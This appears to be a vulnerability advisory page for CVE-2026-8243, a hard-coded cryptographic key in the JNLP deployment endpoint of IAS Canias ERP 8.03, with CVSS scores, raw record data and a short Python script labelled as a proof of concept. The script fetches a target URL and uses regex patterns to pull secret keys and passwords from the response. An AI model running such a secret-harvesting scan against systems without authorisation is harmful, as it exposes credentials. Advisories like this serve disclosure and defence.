Security Vulnerability Report
CVE-2026-8243 CVSS 5.3 MEDIUM

CVE-2026-8243

Published: 2026-05-10 09:16:32
Last Modified: 2026-05-11 15:08:10

Description

A vulnerability was found in Industrial Application Software IAS Canias ERP 8.03. It affects an unknown function of the component JNLP Deployment Endpoint. Manipulation can lead to the use of a hard-coded cryptographic key. The attack may be performed remotely. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

IAS Canias ERP 8.03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re
import requests

# Proof of Concept for CVE-2026-8243
# Description: Checks for hardcoded keys in JNLP endpoint responses.
# Target: IAS Canias ERP 8.03


def check_hardcoded_keys(target_url):
    """
    Fetches the target URL and searches for potential hardcoded keys.
    """
    try:
        response = requests.get(target_url, timeout=10)
        content = response.text

        # Regex pattern to find potential hardcoded keys (Base64 strings or specific key declarations)
        # Note: Adjust pattern based on actual application structure
        key_patterns = [
            r'(private[_-]?key|secret[_-]?key|api[_-]?key)[\s]*[:=][\s]*["\']([a-zA-Z0-9+/=]{16,})["\']',
            r'password[\s]*[:=][\s]*["\']([^"\'>]{8,})["\']'
        ]

        found_keys = []
        for pattern in key_patterns:
            matches = re.findall(pattern, content, re.IGNORECASE)
            if matches:
                found_keys.extend(matches)

        if found_keys:
            print(f"[+] Potential hardcoded keys found at {target_url}:")
            for match in found_keys:
                print(f"  - {match}")
        else:
            print("[-] No obvious hardcoded keys detected in response.")

    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    # Replace with actual target endpoint
    target = "http://target-host:port/canias/jnlp/launch"
    check_hardcoded_keys(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8243", "sourceIdentifier": "[email protected]", "published": "2026-05-10T09:16:32.200", "lastModified": "2026-05-11T15:08:09.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This affects an unknown function of the component JNLP Deployment Endpoint. Executing a manipulation can lead to use of hard-coded cryptographic key\r . The attack may be performed from remote. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://vuldb.com/submit/808296", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362459", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362459/cti", "source": "[email protected]"}]}}